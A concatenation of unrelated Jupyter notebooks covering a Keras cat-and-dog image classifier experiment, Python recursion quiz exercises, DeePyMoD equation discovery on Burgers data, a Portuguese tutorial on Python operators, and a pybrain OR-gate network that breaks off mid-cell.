warnings.warn('The `nb_epoch` argument in `fit` ' ###Markdown RMSprop is better than adam, so we will choose RMSprop in our best model. Change the kernel initializer Change the kernel_initializer to 'random_uniform' ###Code optimizer = RMSprop(lr=1e-4) objective = 'binary_crossentropy' def catdog(): model = Sequential() model.add(Convolution2D(32, 3, 3, border_mode='same', input_shape=(3, ROWS, COLS), activation='relu')) model.add(Convolution2D(32, 3, 3, border_mode='same', activation='relu')) model.add(MaxPooling2D(pool_size=(1, 2))) model.add(Convolution2D(64, 3, 3, border_mode='same', activation='relu')) model.add(Convolution2D(64, 3, 3, border_mode='same', activation='relu')) model.add(MaxPooling2D(pool_size=(1, 2))) model.add(Convolution2D(128, 3, 3, border_mode='same', activation='relu')) model.add(Convolution2D(128, 3, 3, border_mode='same', activation='relu')) model.add(MaxPooling2D(pool_size=(1, 2))) model.add(Convolution2D(256, 3, 3, border_mode='same', activation='relu')) model.add(Convolution2D(256, 3, 3, border_mode='same', activation='relu')) # model.add(Convolution2D(256, 3, 3, border_mode='same', activation='relu')) model.add(MaxPooling2D(pool_size=(1, 2))) # model.add(Convolution2D(256, 3, 3, border_mode='same', activation='relu')) # model.add(Convolution2D(256, 3, 3, border_mode='same', activation='relu')) # model.add(Convolution2D(256, 3, 3, border_mode='same', activation='relu')) # model.add(MaxPooling2D(pool_size=(1, 2))) model.add(Flatten()) model.add(Dense(256, activation='relu')) model.add(Dropout(0.5)) model.add(Dense(256, activation='relu')) model.add(Dropout(0.5)) model.add(Dense(64,kernel_initializer='random_uniform',bias_initializer='zeros')) model.add(Dense(1)) model.add(Activation('sigmoid')) model.compile(loss=objective, optimizer=optimizer, metrics=['accuracy']) return model model = catdog() model.fit( X_train, Y_train, batch_size = 128, nb_epoch = 4, verbose = 1, validation_data = (X_valid, Y_valid) ) ###Output C:\Users\HH\Anaconda3\lib\site-packages\keras\models.py:942: UserWarning: The `nb_epoch` argument in `fit` has been renamed `epochs`. 
warnings.warn('The `nb_epoch` argument in `fit` ' ###Markdown We get a very low test accuracy. Change the number of convolution filters Reduce the number of convolution filters and see the change ###Code import os, cv2, random import numpy as np import pandas as pd import matplotlib.pyplot as plt from matplotlib import ticker import seaborn as sns %matplotlib inline from keras.models import Sequential from keras.layers import Input, Dropout, Flatten, Convolution2D, MaxPooling2D, Dense, Activation from keras.optimizers import RMSprop from keras.callbacks import ModelCheckpoint, Callback, EarlyStopping from keras.utils import np_utils TRAIN_DIR = './train/train/' TEST_DIR = './test/test/' ROWS = 32 COLS = 32 CHANNELS = 1 train_images = [TRAIN_DIR + i for i in os.listdir(TRAIN_DIR)] # use this for full dataset test_images = [TEST_DIR + i for i in os.listdir(TEST_DIR)] def read_image(file_path): img = cv2.imread(file_path, cv2.IMREAD_GRAYSCALE) return cv2.resize(img, (ROWS, COLS), interpolation=cv2.INTER_CUBIC) def prep_data(images): count = len(images) data = np.ndarray((count, CHANNELS, ROWS, COLS), dtype=np.uint8) for i, image_file in enumerate(images): image = read_image(image_file) data[i] = image.T if i % 2500 == 0: print('Processed {} of {}'.format(i, count)) return data train = prep_data(train_images) test = prep_data(test_images) print("Train shape: {}".format(train.shape)) print("Test shape: {}".format(test.shape)) labels = [] for i in train_images: if 'dog' in i: labels.append(1) else: labels.append(0) train = train.reshape(-1, 32,32,1) test = test.reshape(-1, 32,32,1) X_train = train.astype('float32') X_test = test.astype('float32') X_train /= 255 X_test /= 255 Y_train = labels X_valid = X_train[:5000, :, :, :] Y_valid = Y_train[:5000] X_train = X_train[5001:25000, :, :, :] Y_train = Y_train[5001:25000] print("Training matrix shape", X_train.shape) print("Testing matrix shape", X_test.shape) def CatDog(): #Neural network model object model = Sequential() #First convolution model.add(Convolution2D( 16, 3, 3, border_mode = 'same', input_shape = (ROWS, COLS, CHANNELS), activation = 'relu' )) #First dimensionality reduction model.add( MaxPooling2D( pool_size = (2, 2) ) ) #Second convolution model.add(Convolution2D( 32, 3, 3, border_mode = 'same', activation = 'relu' )) #Second dimensionality reduction model.add( MaxPooling2D( pool_size = (2, 2) ) ) #Dimensionality reduction to single array model.add(Flatten()) #Dense layers - linear model on flattened array model.add(Dense(100, activation = 'relu')) #Prevent overfitting by randomly setting some model coefficients to zero model.add(Dropout(0.5)) #More dense layers model.add(Dense(100, activation = 'relu')) #More overfitting prevention model.add(Dropout(0.5)) #Last dense layer model.add(Dense(1)) #Add output to model model.add(Activation('sigmoid')) #Compile model and return model.compile( loss = 'binary_crossentropy', optimizer = 'adam', metrics=['accuracy'] ) return model model = CatDog() model.fit( X_train, Y_train, batch_size = 128, nb_epoch = 4, verbose = 1, validation_data = (X_valid, Y_valid) ) ###Output C:\Users\HH\Anaconda3\lib\site-packages\keras\models.py:942: UserWarning: The `nb_epoch` argument in `fit` has been renamed `epochs`. 
warnings.warn('The `nb_epoch` argument in `fit` ' ###Markdown We find that the train accuracy is increased and training is faster Increase the number of convolution filters and see the change ###Code optimizer = 'adam' objective = 'binary_crossentropy' def catdog(): model = Sequential() model.add(Convolution2D(16, 3, 3, border_mode='same', input_shape=(ROWS, COLS, CHANNELS), activation='relu')) model.add(Convolution2D(16, 3, 3, border_mode='same', activation='relu')) model.add(MaxPooling2D(pool_size=(2, 2))) model.add(Convolution2D(32, 3, 3, border_mode='same', activation='relu')) model.add(Convolution2D(32, 3, 3, border_mode='same', activation='relu')) model.add(MaxPooling2D(pool_size=(2, 2))) model.add(Convolution2D(64, 3, 3, border_mode='same', activation='relu')) model.add(Convolution2D(64, 3, 3, border_mode='same', activation='relu')) model.add(MaxPooling2D(pool_size=(1, 1))) model.add(Convolution2D(128, 3, 3, border_mode='same', activation='relu')) model.add(Convolution2D(128, 3, 3, border_mode='same', activation='relu')) model.add(MaxPooling2D(pool_size=(1, 1))) model.add(Conv2D(256, (3, 3), padding='same', activation='relu')) model.add(Conv2D(256, (3, 3), padding='same', activation='relu')) model.add(Conv2D(256, (3, 3), padding='same', activation='relu')) model.add(MaxPooling2D(pool_size=(2, 2))) model.add(Flatten()) model.add(Dense(256, activation='relu')) model.add(Dropout(0.5)) model.add(Dense(256, activation='relu')) model.add(Dropout(0.5)) model.add(Dense(1)) model.add(Activation('sigmoid')) model.compile(loss=objective, optimizer=optimizer, metrics=['accuracy']) return model model = catdog() nb_epoch = 4 batch_size = 128 model.fit(X_train, Y_train, batch_size=batch_size, nb_epoch=nb_epoch, verbose=1, validation_data=(X_valid, Y_valid)) ###Output C:\Users\HH\Anaconda3\lib\site-packages\keras\models.py:942: UserWarning: The `nb_epoch` argument in `fit` has been renamed `epochs`. warnings.warn('The `nb_epoch` argument in `fit` ' ###Markdown The test accuracy is very low and training is too slow, but the train accuracy is high Find the best number of epochs Finally we have two models: one is 32x32 with 4 convolution layers and adam as the optimizer; the other is 64x64 with 8 convolution layers and RMSprop as the optimizer. We used 4 epochs before. In fact we don't know the best number of epochs, so we train for 80 epochs to see the trend of the train accuracy. 
###Code TRAIN_DIR = './train/train/' TEST_DIR = './test/test/' ROWS = 32 COLS = 32 CHANNELS = 1 train_images = [TRAIN_DIR+i for i in os.listdir(TRAIN_DIR)] # use this for full dataset train_dogs = [TRAIN_DIR+i for i in os.listdir(TRAIN_DIR) if 'dog' in i] train_cats = [TRAIN_DIR+i for i in os.listdir(TRAIN_DIR) if 'cat' in i] test_images = [TEST_DIR+i for i in os.listdir(TEST_DIR)] def read_image(file_path): img = cv2.imread(file_path, cv2.IMREAD_GRAYSCALE) #cv2.IMREAD_GRAYSCALE return cv2.resize(img, (ROWS, COLS), interpolation=cv2.INTER_CUBIC) def prep_data(images): count = len(images) data = np.ndarray((count, CHANNELS, ROWS, COLS), dtype=np.uint8) for i, image_file in enumerate(images): image = read_image(image_file) data[i] = image.T if i%2500 == 0: print('Processed {} of {}'.format(i, count)) return data train = prep_data(train_images) test = prep_data(test_images) print("Train shape: {}".format(train.shape)) print("Test shape: {}".format(test.shape)) labels = [] for i in train_images: if 'dog' in i: labels.append(1) else: labels.append(0) train = train.reshape(-1, 32,32,1) test = test.reshape(-1, 32,32,1) X_train = train.astype('float32') X_test = test.astype('float32') X_train /= 255 X_test /= 255 Y_train=labels X_valid = X_train[:5000,:,:,:] Y_valid = Y_train[:5000] X_train = X_train[5001:25000,:,:,:] Y_train = Y_train[5001:25000] print("Training matrix shape", X_train.shape) print("Testing matrix shape", X_test.shape) optimizer = 'adam' objective = 'binary_crossentropy' def catdog(): model = Sequential() model.add(Convolution2D(16, 3, 3, border_mode='same', input_shape=(ROWS, COLS, CHANNELS), activation='relu')) model.add(Convolution2D(16, 3, 3, border_mode='same', activation='relu')) model.add(MaxPooling2D(pool_size=(2, 2))) model.add(Convolution2D(32, 3, 3, border_mode='same', activation='relu')) model.add(Convolution2D(32, 3, 3, border_mode='same', activation='relu')) model.add(MaxPooling2D(pool_size=(2, 2))) #model.add(Convolution2D(64, 3, 3, border_mode='same', activation='relu')) #model.add(Convolution2D(64, 3, 3, border_mode='same', activation='relu')) #model.add(MaxPooling2D(pool_size=(1, 1))) #model.add(Convolution2D(128, 3, 3, border_mode='same', activation='relu')) #model.add(Convolution2D(128, 3, 3, border_mode='same', activation='relu')) #model.add(MaxPooling2D(pool_size=(1, 1))) model.add(Flatten()) model.add(Dense(128, activation='relu')) model.add(Dropout(0.5)) model.add(Dense(128, activation='relu')) model.add(Dropout(0.5)) model.add(Dense(1)) model.add(Activation('sigmoid')) model.compile(loss=objective, optimizer=optimizer, metrics=['accuracy']) return model model = catdog() model.fit( X_train, Y_train, batch_size = 128, nb_epoch = 80, verbose = 1, validation_data = (X_valid, Y_valid) ) ###Output C:\Users\HH\Anaconda3\lib\site-packages\keras\models.py:942: UserWarning: The `nb_epoch` argument in `fit` has been renamed `epochs`. warnings.warn('The `nb_epoch` argument in `fit` ' ###Markdown ![accuracy](accuracy.png) So we think this model's best epochs number should be 30 ###Code model.fit( X_train, Y_train, batch_size = 128, nb_epoch = 30, verbose = 1, validation_data = (X_valid, Y_valid) ) ###Output C:\Users\HH\Anaconda3\lib\site-packages\keras\models.py:942: UserWarning: The `nb_epoch` argument in `fit` has been renamed `epochs`. 
warnings.warn('The `nb_epoch` argument in `fit` ' ###Markdown The train accuracy is 0.97 and the test accuracy is 0.73 ###Code TRAIN_DIR = './train/train/' TEST_DIR = './test/test/' ROWS = 64 COLS = 64 CHANNELS = 3 train_images = [TRAIN_DIR+i for i in os.listdir(TRAIN_DIR)] # use this for full dataset train_dogs = [TRAIN_DIR+i for i in os.listdir(TRAIN_DIR) if 'dog' in i] train_cats = [TRAIN_DIR+i for i in os.listdir(TRAIN_DIR) if 'cat' in i] test_images = [TEST_DIR+i for i in os.listdir(TEST_DIR)] def read_image(file_path): img = cv2.imread(file_path, cv2.IMREAD_COLOR) #cv2.IMREAD_GRAYSCALE return cv2.resize(img, (ROWS, COLS), interpolation=cv2.INTER_CUBIC) def prep_data(images): count = len(images) data = np.ndarray((count, CHANNELS, ROWS, COLS), dtype=np.uint8) for i, image_file in enumerate(images): image = read_image(image_file) data[i] = image.T if i%2500 == 0: print('Processed {} of {}'.format(i, count)) return data train = prep_data(train_images) test = prep_data(test_images) print("Train shape: {}".format(train.shape)) print("Test shape: {}".format(test.shape)) labels = [] for i in train_images: if 'dog' in i: labels.append(1) else: labels.append(0) train = train.reshape(-1,3,64,64) test = test.reshape(-1,3,64,64) X_train = train.astype('float64') X_test = test.astype('float64') X_train /= 255 X_test /= 255 Y_train = labels X_valid = X_train[:5000, :, :, :] Y_valid = Y_train[:5000] X_train = X_train[5001:25000, :, :, :] Y_train = Y_train[5001:25000] print("Training matrix shape", X_train.shape) print("Testing matrix shape", X_test.shape) sns.countplot(labels) plt.title('Cats and Dogs') optimizer = RMSprop(lr=1e-4) objective = 'binary_crossentropy' def catdog(): model = Sequential() model.add(Convolution2D(32, 3, 3, border_mode='same', input_shape=(3, ROWS, COLS), activation='relu')) model.add(Convolution2D(32, 3, 3, border_mode='same', activation='relu')) model.add(MaxPooling2D(pool_size=(1, 2))) model.add(Convolution2D(64, 3, 3, border_mode='same', activation='relu')) model.add(Convolution2D(64, 3, 3, border_mode='same', activation='relu')) model.add(MaxPooling2D(pool_size=(1, 2))) model.add(Convolution2D(128, 3, 3, border_mode='same', activation='relu')) model.add(Convolution2D(128, 3, 3, border_mode='same', activation='relu')) model.add(MaxPooling2D(pool_size=(1, 2))) model.add(Convolution2D(256, 3, 3, border_mode='same', activation='relu')) model.add(Convolution2D(256, 3, 3, border_mode='same', activation='relu')) model.add(MaxPooling2D(pool_size=(1, 2))) model.add(Flatten()) model.add(Dense(256, activation='relu')) model.add(Dropout(0.5)) model.add(Dense(256, activation='relu')) model.add(Dropout(0.5)) model.add(Dense(1)) model.add(Activation('sigmoid')) model.compile(loss=objective, optimizer=optimizer, metrics=['accuracy']) return model model = catdog() history = model.fit( X_train, Y_train, batch_size = 128, nb_epoch = 80, verbose = 1, validation_data = (X_valid, Y_valid) ) ###Output C:\Users\HH\Anaconda3\lib\site-packages\keras\models.py:942: UserWarning: The `nb_epoch` argument in `fit` has been renamed `epochs`. warnings.warn('The `nb_epoch` argument in `fit` ' ###Markdown ![accuracy](accuracy2.png) We think the best number should be around 24 ###Code history = model.fit( X_train, Y_train, batch_size = 128, nb_epoch = 24, verbose = 1, validation_data = (X_valid, Y_valid) ) ###Output C:\Users\HH\Anaconda3\lib\site-packages\keras\models.py:942: UserWarning: The `nb_epoch` argument in `fit` has been renamed `epochs`. warnings.warn('The `nb_epoch` argument in `fit` '
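Having settled on the 64x64 model, the natural last step for this dataset is to turn the test-set probabilities into a Kaggle-style submission file. A hedged sketch is below; the column names follow the usual competition convention, and extracting the numeric id assumes test file names like `1.jpg`, which this notebook never confirms.

```python
import re

predictions = model.predict(X_test, verbose=0)  # sigmoid output = P(dog)
with open('submission.csv', 'w') as f:
    f.write('id,label\n')
    for path, prob in zip(test_images, predictions.ravel()):
        img_id = re.search(r'(\d+)\.jpg$', path).group(1)  # assumes names like '1.jpg'
        f.write('{},{}\n'.format(img_id, prob))
```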
phython paper.ipynb
###Markdown Q1 Write a Python program to calculate the sum of a list of numbers using a recursive function. For any given list like [2, 4, 5, 6, 7] and a recursive function, i.e. def list_sum(num_List), which one of the following options related to the code will be correct? ###Code def listsum(numlist): if len(numlist)==1: return numlist[0] else: return numlist[0]+listsum(numlist[1:]) print(listsum([2,4,5,6,7])) ###Output 24 ###Markdown Q2 Write a Python program to calculate the value of 'a' to the power 'b' using recursion. Suppose the recursive function has been defined as: def power(a, b), where a is the base and b is the exponent. Then which of the following options cannot be true? ###Code def power(a,b): if b==0: return 1 elif b==1: return a else: return(a*power(a,b-1)) a=4 b=2 print(power(a,b)) ###Output 16 ###Markdown Q3 Write a Python program to count repeated characters in a string. State whether a dictionary might be helpful in this case or not. ###Code import collections str1="hhfgffgfgcgchcdfdtd" d=collections.defaultdict(int) for c in str1: d[c]+=1 for c in sorted(d,key=d.get,reverse= True): if d[c]>1: print("%s%d"%(c,d[c])) ###Output f5 g4 h3 c3 d3 ###Markdown Q4 Write a Python program to find the intersection of two given arrays using a lambda. Which of the following will be the correct interpretation of the lambda expression? Note here array_nums1 and array_nums2 are two input arrays. ###Code num1=[2,4,6,7] num2=[1,2,3] print("original arrays:") print(num1) print(num2) result=list(filter(lambda x:x in num1,num2)) print("\n intersection of the array:",result) ###Output original arrays: [2, 4, 6, 7] [1, 2, 3] intersection of the array: [2] ###Markdown Q5 Write a Python program to add two given lists and find the difference between the lists. Use the map() function. Which of the following would be the correct function definition? ###Code num1=[1,2,3,4,5] num2=[2,4,5,6] print("list:") print(num1) print(num2) result=map(lambda x,y:x+y,num1,num2) print(list(result)) ###Output list: [1, 2, 3, 4, 5] [2, 4, 5, 6] [3, 6, 8, 10] ###Markdown Q6 Write a recursive Python program to copy one string to another. Which of the following can be the base condition? ###Code def copy_string(str,str1,i): str1[i]=str[i] if(str[i]=='\0'): return copy_string(str,str1,i+1) str=input("enter the string: ") str+='\0' str1=[0]*(len(str)) copy_string(str,str1,0) print("copy string is:","".join(str1)) ###Output enter the string: harsh copy string is: harsh
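As a follow-up to Q2: the recursion above makes b-1 recursive calls. A standard improvement is the square-and-multiply (divide-and-conquer) variant, which halves the exponent on every call and so runs in O(log b) calls; a short sketch:

```python
def fast_power(a, b):
    # square-and-multiply: the exponent halves on every recursive call
    if b == 0:
        return 1
    half = fast_power(a, b // 2)
    if b % 2 == 0:
        return half * half
    return a * half * half

print(fast_power(4, 2))  # 16, same result as power(4, 2)
```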
examples/Example_new_deepmod.ipynb
###Markdown In this notebook we show how to use the new deepymod code and phimal utilities to load data and perform data analysis: ###Code import numpy as np import pandas as pd import torch from DeePyMoD_SBL.deepymod_torch.library_functions import library_1D_in from DeePyMoD_SBL.deepymod_torch.DeepMod import DeepModDynamic from DeePyMoD_SBL.deepymod_torch.training import train_dynamic from sklearn.linear_model import LassoLarsIC from phimal_utilities.data import Dataset from phimal_utilities.data.burgers import BurgersDelta from phimal_utilities.analysis import load_tensorboard if torch.cuda.is_available(): torch.set_default_tensor_type('torch.cuda.FloatTensor') import seaborn as sns import matplotlib.pyplot as plt plt.style.use('ggplot') %load_ext autoreload %autoreload 2 ###Output The autoreload extension is already loaded. To reload it, use: %reload_ext autoreload ###Markdown Making data ###Code x = np.linspace(-3, 4, 100) t = np.linspace(0.5, 5.0, 50) x_grid, t_grid = np.meshgrid(x, t, indexing='ij') ###Output _____no_output_____ ###Markdown Create a dataset by giving your solution to the object and its parameters (make sure they're named) ###Code dataset = Dataset(BurgersDelta, v=0.1, A=1.0) ###Output _____no_output_____ ###Markdown We can easily generate a solution given our grid: ###Code u = dataset.generate_solution(x_grid, t_grid) frame = 10 plt.plot(x, u[:, frame - 10]) plt.plot(x, u[:, frame]) plt.plot(x, u[:, frame + 10]) ###Output _____no_output_____ ###Markdown Or check if our solution is correct using the library: ###Code theta = dataset.library(x_grid.reshape(-1, 1), t_grid.reshape(-1, 1)) dt = dataset.time_deriv(x_grid.reshape(-1, 1), t_grid.reshape(-1, 1)) np.linalg.lstsq(theta, dt, rcond=None)[0] ###Output _____no_output_____ ###Markdown We can also automatically create input data for deepmod. To confirm that we add noise, we use all samples (set n_samples=0 for all) and turn off randomization: ###Code X_train, y_train = dataset.create_dataset(x_grid.reshape(-1, 1), t_grid.reshape(-1, 1), n_samples=0, noise=0.1, random=False) u_noisy = y_train.reshape(x_grid.shape).cpu().detach().numpy() frame = 10 plt.plot(x, u[:, frame], label='True') plt.plot(x, u_noisy[:, frame], label='Noisy') plt.legend() ###Output _____no_output_____ ###Markdown Now let's generate a real dataset: ###Code X_train, y_train = dataset.create_dataset(x_grid.reshape(-1, 1), t_grid.reshape(-1, 1), n_samples=2000, noise=0.1, random=True) ###Output _____no_output_____ ###Markdown Running deepmod Now we show how to use the new deepmod. We first define which sparsity estimator we want to use. All estimators from scikit-learn are fine. Set fit_intercept to False, as that term is already in our model. ###Code estimator = LassoLarsIC(fit_intercept=False) ###Output _____no_output_____ ###Markdown Then we define the config and build the model as always: ###Code config = {'n_in': 2, 'hidden_dims': [30, 30, 30, 30, 30], 'n_out': 1, 'library_function':library_1D_in, 'library_args':{'poly_order':2, 'diff_order': 2}, 'sparsity_estimator': estimator} model = DeepModDynamic(**config) # In the future, I want to change the api so that we would do the following: ''' function_approximator = network(n_in=2, hidden_dims=[30, 30, 30, 30, 30], n_out=1) library = Library(function=library_1D_in, poly_order=2, deriv_order=2) sparse_estimator = Estimator(fit_intercept=False) model = DeepMoD(function_approximator, library, sparse_estimator) ''' # main reason is not to get a massive config dictionary which is not very clear. 
This would also be super flexible. ###Output _____no_output_____ ###Markdown Define the optimizer: ###Code optimizer = torch.optim.Adam(model.network_parameters(), betas=(0.99, 0.999), amsgrad=True) ###Output _____no_output_____ ###Markdown And train for 15k iterations. We start the sparsity update after 5000 iterations, so we have a good estimate of the data, and update it every 200 iterations thereafter: ###Code train_dynamic(model, X_train, y_train, optimizer, 15000, loss_func_args={'start_sparsity_update': 5000, 'sparsity_update_period': 200}) ###Output | Iteration | Progress | Time remaining | Cost | MSE | Reg | L1 | 15000 100.00% 0s 3.44e-04 3.41e-04 2.66e-06 0.00e+00 ###Markdown We get the following coefficients from the sparsity model (which are biased by the L1 penalty): ###Code model.sparsity_estimator.coef_ ###Output _____no_output_____ ###Markdown We get the unbiased coefficients from the network via: ###Code model.constraints.coeff_vector ###Output _____no_output_____ ###Markdown It has one extra term, but it's super small. That's an issue for next time. This is done with 10% noise. Analysing To analyse more in depth, we can load the tensorboard file: ###Code # right now works with file path, will change to experiment_ID df = load_tensorboard('runs/Apr22_16-06-14_4b6076e78386/') df.head(5) ###Output _____no_output_____ ###Markdown All the keys are: ###Code df.keys() ###Output _____no_output_____ ###Markdown We plot the losses: ###Code plt.figure(figsize=(20, 5)) plt.subplot(131) plt.semilogy(df.index, df['Total_loss'], label='Total') plt.semilogy(df.index, df['MSE_0'], label='MSE') plt.semilogy(df.index, df['Regression_0'], label='PI') plt.title('All losses') plt.legend() plt.subplot(132) plt.semilogy(df.index, df['MSE_0'], label='MSE') plt.title('MSE') plt.subplot(133) plt.semilogy(df.index, df['Regression_0'], label='PI') plt.title('Regression') ###Output _____no_output_____ ###Markdown Now let's look at the coefficients: ###Code coeff_keys = [key for key in df.keys() if key[:5]=='coeff'] scaled_coeff_keys = [key for key in df.keys() if key[:6]=='scaled'] for key in coeff_keys: plt.plot(df[key], label=f'{key[-1]}') plt.legend() plt.ylim([-1.5, 0.5]) plt.title('Coefficients') for key in scaled_coeff_keys: plt.plot(df[key], label=f'{key[-1]}') plt.legend() plt.ylim([-1.5, 1]) plt.title('Scaled coefficients') ###Output _____no_output_____ ###Markdown So we do see a few kinks but not many and certainly with minimal effect. We can also check when terms are in the model: ###Code in_model = [] for key in scaled_coeff_keys: in_model.append(df[key].to_numpy()[:, None]) in_model = np.concatenate(in_model, axis=1) in_model[np.abs(in_model) > 0 ]= 1 sns.heatmap(in_model) plt.title('Heatmap of coefficients in model') ###Output _____no_output_____
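A readable way to close the loop is to print the discovered equation from the final coefficients. The sketch below is hedged: the term ordering for `library_1D_in` with poly_order=2 and diff_order=2 (polynomials of u times derivatives of u) is our assumption and should be checked against the library code, as is the assumption that `coeff_vector` is a list holding one tensor per output.

```python
# Hedged sketch: turn the final coefficient vector into a readable PDE.
terms = ['1', 'u_x', 'u_xx', 'u', 'u*u_x', 'u*u_xx', 'u^2', 'u^2*u_x', 'u^2*u_xx']  # assumed ordering
coeffs = model.constraints.coeff_vector[0].detach().cpu().numpy().flatten()  # assumes a list of tensors
equation = ' + '.join('{:.3f} {}'.format(c, t) for c, t in zip(coeffs, terms) if abs(c) > 1e-4)
print('u_t = ' + equation)  # for Burgers with v=0.1 we expect roughly 0.100 u_xx + -1.000 u*u_x
```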
python-language/Operadores.ipynb
###Markdown > **Author:** Érick Barbosa de Souza>> **Home:** https://abre.ai/ebsouza-pagina>> **Instagram:** @erickbsouza--- **Operators** Operators are special symbols that have their own meaning in the language and are associated with particular operations. In Python there are, for example, arithmetic, logical, comparison and assignment operators, among others. Every operator needs at least one operand. For example, the expression 'a + b' contains one operator (+) and two operands ('a' and 'b'). Another example is the expression 'not a', which has only one operator (not) and one operand (a). **Arithmetic operators** These perform mathematical operations between two numeric values. | Operator | Meaning | Example || :--- | :----: | ---: || + | Adds two values | a + b || - | Subtracts two values | a - b || * | Multiplies two values | a * b || / | Divides the left value by the right one | a / b || // | Integer part of the division performed by the '/' operator | a // b || % | Remainder of the division 'a / b' | a % b || ** | Raises 'a' to the power of 'b' | a ** b | ###Code # Examples a = 22 b = 4 # Output: a + b = 26 print('a + b =',a+b) # Output: a - b = 18 print('a - b =',a-b) # Output: a * b = 88 print('a * b =',a*b) # Output: a / b = 5.5 print('a / b =',a/b) # Output: a // b = 5 print('a // b =',a//b) # Output: a % b = 2 print('a % b =',a%b) # Output: a ** b = 234256 print('a ** b =',a**b) ###Output a + b = 26 a - b = 18 a * b = 88 a / b = 5.5 a // b = 5 a % b = 2 a ** b = 234256 ###Markdown **Comparison operators** These compare two values, and the result of the operation is a boolean value. | Operator | Meaning | Example || :--- | :----: | ---: || > | 'a' greater than 'b' | a > b || < | 'a' less than 'b' | a < b || == | 'a' equal to 'b' | a == b || != | 'a' different from 'b' | a != b || >= | 'a' greater than OR equal to 'b' | a >= b || <= | 'a' less than OR equal to 'b' | a <= b | ###Code a = 15 b = 28 # Output: a > b is False print('a > b is',a>b) # Output: a < b is True print('a < b is',a<b) # Output: a == b is False print('a == b is',a==b) # Output: a != b is True print('a != b is',a!=b) # Output: a >= b is False print('a >= b is',a>=b) # Output: a <= b is True print('a <= b is',a<=b) ###Output a > b is False a < b is True a == b is False a != b is True a >= b is False a <= b is True ###Markdown In Python it is also possible to chain comparison operators. ###Code x = 28 # Output: 10 < x < 20 is False print('10 < x < 20 is', 10<x<20) # Output: 20 < x < 30 is True print('20 < x < 30 is', 20<x<30) ###Output 10 < x < 20 is False 20 < x < 30 is True ###Markdown **Logical operators** These operators take boolean values as operands. | Operator | Meaning | Example || :--- | :----: | ---: || and | True if 'a' AND 'b' are true | a and b || or | True if 'a' OR 'b' is true | a or b || not | Inversion of the boolean value | not a | ###Code a = True b = False print('a and b is',a and b) # Conjunction (AND) of 'a' and 'b' print('a or b is',a or b) # Disjunction (OR) of 'a' and 'b' print('not a is',not a) # Negation (NOT) of 'a' ###Output a and b is False a or b is True not a is False ###Markdown **Bitwise operators** These operators act directly on the bits of the values being operated on. 
Por exemplo, a operação 'a & b' resulta num valor cujo os bits são resultados da conjunção dos respectivos bits de 'a' e 'b' na mesma posição.> **a** = 10 (0000 1010)>> **b** = 4 (0000 0100)> > **a** **&** **b** = 0 (0000 0000) ###Code a = 10 # (0000 1010) b = 4 # (0000 0100) print(f"a & b = {a & b} (0000 0000)" ) # Conjunção(AND) entre bits print(f"a | b = {a | b} (0000 1110)" ) # Disjunção(OR) entre bits print(f"~a = {~a} (1111 0101)" ) # Negação(NOT) de cada bit print(f"a ^ b = {a ^ b} (0000 1110)" ) # Ou exclusivo(XOR) entre bits print(f"a >> 2 = {a >> 2} (0000 0010)" ) # Shift a direita, 2 neste exemplo print(f"a << 2 = {a << 2} (0010 1000)" ) # Shift a esquerda, 2 neste exemplo ###Output a & b = 0 (0000 0000) a | b = 14 (0000 1110) ~a = -11 (1111 0101) a ^ b = 14 (0000 1110) a >> 2 = 2 (0000 0010) a << 2 = 40 (0010 1000) ###Markdown **Operadores de atribuíção**O operador atribuição(=) pode ser combinado com outros operadores. Isso agiliza bastante a escrita de um código. Afinal, escrever x += 3 é bem mais rápido que x = x + 3 não é mesmo? Confira outros exemplos. ###Code print( " 'x += 3' é equivalente a 'x = x + 3' ") print( " 'x -= 3' é equivalente a 'x = x - 3' ") print( " 'x *= 3' é equivalente a 'x = x * 3' ") print(" ") print( " 'x /= 3' é equivalente a 'x = x / 3' ") print( " 'x %= 3' é equivalente a 'x = x % 3' ") print( " 'x //= 3' é equivalente a 'x = x // 3' ") print(" ") print( " 'x **= 3' é equivalente a 'x = x ** 3' ") print( " 'x &= 3' é equivalente a 'x = x & 3' ") print( " 'x |= 3' é equivalente a 'x = x | 3' ") print(" ") print( " 'x ^= 3' é equivalente a 'x = x ^ 3' ") print( " 'x >>= 3' é equivalente a 'x = x >> 3' ") print( " 'x <<= 3' é equivalente a 'x = x << 3' ") ###Output 'x += 3' é equivalente a 'x = x + 3' 'x -= 3' é equivalente a 'x = x - 3' 'x *= 3' é equivalente a 'x = x * 3' 'x /= 3' é equivalente a 'x = x / 3' 'x %= 3' é equivalente a 'x = x % 3' 'x //= 3' é equivalente a 'x = x // 3' 'x **= 3' é equivalente a 'x = x ** 3' 'x &= 3' é equivalente a 'x = x & 3' 'x |= 3' é equivalente a 'x = x | 3' 'x ^= 3' é equivalente a 'x = x ^ 3' 'x >>= 3' é equivalente a 'x = x >> 3' 'x <<= 3' é equivalente a 'x = x << 3' ###Markdown **Operadores de identidade**Similar aos operadores de comparação, estes comparam se os operandos são iguais como objetos e não apenas em conteúdo(valores).Estes operadores são ainda mais importantes quando trabalhamos com Programação Orientada a Objetos. ###Code a = 1 b = '1' # Output: a is b = False print(" a is b =", a is b) # Output: a is not b = True print(" a is not b =", a is not b) a = [1,2,3,4,5] a = ['1','2','3','4','5'] # Output: a is b = False print(" a is b =", a is b) # Output: a is not b = True print(" a is not b =", a is not b) ###Output a is b = False a is not b = True
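###Markdown One extra illustrative cell (a small sketch, not part of the original notebook): `==` compares values while `is` compares identity, so two lists with the same content are `==` but not `is`. ###Code a = [1, 2, 3]
b = [1, 2, 3]
c = a
print("a == b is", a == b)   # True: same content
print("a is b is", a is b)   # False: two distinct objects in memory
print("a is c is", a is c)   # True: both names point to the same object
###Output _____no_output_____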
semana07-30-10-2020/funcoes-logicas-pybrain/.ipynb_checkpoints/Rede Neural - OR-checkpoint.ipynb
###Markdown Implementing an OR Logic Function with Neural Networks Creating a neural network with pybrain for the OR logic structure. ![porta-or](Imagens/or.png) ###Code # importing the functions from the Python pybrain library from pybrain.tools.shortcuts import buildNetwork from pybrain.datasets import SupervisedDataSet from pybrain.supervised.trainers import BackpropTrainer from pybrain.structure.modules import SigmoidLayer from pybrain.structure.modules import LinearLayer # defining a neural network with 2 neurons in the input layer, 3 in the hidden layer and 1 in the output layer # using 'LinearLayer' as the activation function of the hidden layers # using 'SigmoidLayer' as the activation function of the output layer rede = buildNetwork(2, 3, 1, hiddenclass = LinearLayer, outclass = SigmoidLayer) # defining a dataset with 2 inputs as predictor attributes and 1 output as the target attribute base = SupervisedDataSet(2, 1) # adding the first training sample to the dataset base.addSample((0,0), (0, )) # adding the second training sample to the dataset base.addSample((0,1), (1, )) # adding the third training sample to the dataset 